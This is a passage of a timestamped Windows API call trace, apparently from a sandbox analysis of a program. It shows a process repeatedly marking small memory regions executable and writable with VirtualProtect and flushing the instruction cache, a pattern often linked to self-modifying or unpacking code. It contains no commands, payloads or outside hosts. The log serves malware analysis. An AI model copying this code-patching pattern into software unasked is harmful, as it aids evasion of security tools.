(hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.673] GetCurrentProcess () returned 0xffffffff [0095.673] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.673] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.674] GetCurrentProcess () returned 0xffffffff [0095.674] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.674] GetCurrentProcess () returned 0xffffffff [0095.674] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.674] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.675] GetCurrentProcess () returned 0xffffffff [0095.675] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.675] GetCurrentProcess () returned 0xffffffff [0095.675] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.675] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.676] GetCurrentProcess () returned 0xffffffff [0095.676] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.676] GetCurrentProcess () returned 0xffffffff [0095.676] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.676] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.676] GetCurrentProcess () returned 0xffffffff [0095.676] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.676] GetCurrentProcess () returned 0xffffffff [0095.676] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.676] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.677] GetCurrentProcess () returned 0xffffffff [0095.677] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.677] GetCurrentProcess () returned 0xffffffff [0095.677] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.677] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.678] GetCurrentProcess () returned 0xffffffff [0095.678] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.678] GetCurrentProcess () returned 0xffffffff [0095.678] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.678] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.678] GetCurrentProcess () returned 0xffffffff [0095.678] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.678] GetCurrentProcess () returned 0xffffffff [0095.678] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.679] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.679] GetCurrentProcess () returned 0xffffffff [0095.679] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.679] GetCurrentProcess () returned 0xffffffff [0095.679] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.679] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.684] GetCurrentProcess () returned 0xffffffff [0095.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.684] GetCurrentProcess () returned 0xffffffff [0095.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.684] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.684] GetCurrentProcess () returned 0xffffffff [0095.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.685] GetCurrentProcess () returned 0xffffffff [0095.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.685] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.685] GetCurrentProcess () returned 0xffffffff [0095.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.685] GetCurrentProcess () returned 0xffffffff [0095.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.685] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.686] GetCurrentProcess () returned 0xffffffff [0095.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.686] GetCurrentProcess () returned 0xffffffff [0095.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.686] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.687] GetCurrentProcess () returned 0xffffffff [0095.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.687] GetCurrentProcess () returned 0xffffffff [0095.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.687] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.688] GetCurrentProcess () returned 0xffffffff [0095.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.688] GetCurrentProcess () returned 0xffffffff [0095.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.688] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.689] GetCurrentProcess () returned 0xffffffff [0095.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.689] GetCurrentProcess () returned 0xffffffff [0095.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.689] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.689] GetCurrentProcess () returned 0xffffffff [0095.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.690] GetCurrentProcess () returned 0xffffffff [0095.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.690] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.690] GetCurrentProcess () returned 0xffffffff [0095.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.690] GetCurrentProcess () returned 0xffffffff [0095.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.690] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.691] GetCurrentProcess () returned 0xffffffff [0095.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.691] GetCurrentProcess () returned 0xffffffff [0095.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.692] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.692] GetCurrentProcess () returned 0xffffffff [0095.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.693] GetAsyncKeyState (vKey=3) returned 0 [0095.694] GetAsyncKeyState (vKey=3) returned 0 [0095.694] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.694] CRetailMalloc_Alloc () returned 0xf52f3c8 [0095.694] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.694] memcpy (in: _Dst=0xf52f3e8, _Src=0x197724, _Size=0x18 | out: _Dst=0xf52f3e8) returned 0xf52f3e8 [0095.694] CRetailMalloc_Realloc () returned 0xf52f3c8 [0095.694] CRetailMalloc_Free () returned 0x1 [0095.694] GetCurrentProcess () returned 0xffffffff [0095.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.694] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.696] GetCurrentProcess () returned 0xffffffff [0095.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.696] GetCurrentProcess () returned 0xffffffff [0095.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.696] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.696] GetCurrentProcess () returned 0xffffffff [0095.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.696] GetCurrentProcess () returned 0xffffffff [0095.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.697] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.697] GetCurrentProcess () returned 0xffffffff [0095.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.697] GetCurrentProcess () returned 0xffffffff [0095.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.697] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.698] GetCurrentProcess () returned 0xffffffff [0095.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.698] GetCurrentProcess () returned 0xffffffff [0095.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.698] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.699] GetCurrentProcess () returned 0xffffffff [0095.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.699] GetCurrentProcess () returned 0xffffffff [0095.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.699] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.700] GetCurrentProcess () returned 0xffffffff [0095.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.700] GetCurrentProcess () returned 0xffffffff [0095.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.700] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.701] GetCurrentProcess () returned 0xffffffff [0095.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.701] GetCurrentProcess () returned 0xffffffff [0095.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.701] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.702] GetCurrentProcess () returned 0xffffffff [0095.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.702] GetCurrentProcess () returned 0xffffffff [0095.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.702] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.703] GetCurrentProcess () returned 0xffffffff [0095.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.703] GetCurrentProcess () returned 0xffffffff [0095.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.703] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.703] GetCurrentProcess () returned 0xffffffff [0095.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.703] GetCurrentProcess () returned 0xffffffff [0095.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.704] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.704] GetCurrentProcess () returned 0xffffffff [0095.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.705] GetCurrentProcess () returned 0xffffffff [0095.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.705] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.705] GetCurrentProcess () returned 0xffffffff [0095.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.705] GetCurrentProcess () returned 0xffffffff [0095.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.705] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.706] GetCurrentProcess () returned 0xffffffff [0095.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.706] GetCurrentProcess () returned 0xffffffff [0095.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.706] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.707] GetCurrentProcess () returned 0xffffffff [0095.707] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.707] GetCurrentProcess () returned 0xffffffff [0095.707] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.708] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.709] GetCurrentProcess () returned 0xffffffff [0095.709] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.709] GetCurrentProcess () returned 0xffffffff [0095.709] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.709] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.710] GetCurrentProcess () returned 0xffffffff [0095.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.710] GetCurrentProcess () returned 0xffffffff [0095.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.710] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.711] GetCurrentProcess () returned 0xffffffff [0095.711] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.711] GetCurrentProcess () returned 0xffffffff [0095.711] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.711] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.712] GetCurrentProcess () returned 0xffffffff [0095.712] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.712] GetCurrentProcess () returned 0xffffffff [0095.712] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.712] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.713] GetCurrentProcess () returned 0xffffffff [0095.713] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.713] GetCurrentProcess () returned 0xffffffff [0095.713] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.713] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.713] GetCurrentProcess () returned 0xffffffff [0095.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.714] GetCurrentProcess () returned 0xffffffff [0095.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.714] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.714] GetCurrentProcess () returned 0xffffffff [0095.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.714] GetCurrentProcess () returned 0xffffffff [0095.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.715] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.715] GetCurrentProcess () returned 0xffffffff [0095.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.715] GetCurrentProcess () returned 0xffffffff [0095.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.715] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.716] GetCurrentProcess () returned 0xffffffff [0095.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.716] GetCurrentProcess () returned 0xffffffff [0095.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.716] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.717] GetCurrentProcess () returned 0xffffffff [0095.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.717] GetCurrentProcess () returned 0xffffffff [0095.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.717] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.718] GetCurrentProcess () returned 0xffffffff [0095.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.718] GetCurrentProcess () returned 0xffffffff [0095.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.718] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.719] GetCurrentProcess () returned 0xffffffff [0095.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.719] GetCurrentProcess () returned 0xffffffff [0095.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.719] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.720] GetCurrentProcess () returned 0xffffffff [0095.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.720] GetCurrentProcess () returned 0xffffffff [0095.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.724] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.725] GetCurrentProcess () returned 0xffffffff [0095.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.725] GetCurrentProcess () returned 0xffffffff [0095.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.725] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.726] GetCurrentProcess () returned 0xffffffff [0095.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.726] GetCurrentProcess () returned 0xffffffff [0095.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.726] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.728] GetCurrentProcess () returned 0xffffffff [0095.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.728] GetCurrentProcess () returned 0xffffffff [0095.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.728] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.728] GetCurrentProcess () returned 0xffffffff [0095.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.729] GetAsyncKeyState (vKey=3) returned 0 [0095.730] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.730] CRetailMalloc_Alloc () returned 0xf52f428 [0095.730] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.730] memcpy (in: _Dst=0xf52f448, _Src=0x197724, _Size=0x18 | out: _Dst=0xf52f448) returned 0xf52f448 [0095.730] CRetailMalloc_Realloc () returned 0xf52f428 [0095.730] CRetailMalloc_Free () returned 0x1 [0095.730] GetCurrentProcess () returned 0xffffffff [0095.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.730] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.731] GetCurrentProcess () returned 0xffffffff [0095.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.731] GetCurrentProcess () returned 0xffffffff [0095.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.731] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.732] GetCurrentProcess () returned 0xffffffff [0095.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.732] GetCurrentProcess () returned 0xffffffff [0095.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.732] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.732] GetCurrentProcess () returned 0xffffffff [0095.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.733] GetCurrentProcess () returned 0xffffffff [0095.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.733] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.733] GetCurrentProcess () returned 0xffffffff [0095.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.733] GetCurrentProcess () returned 0xffffffff [0095.733] FlushInstructionCache 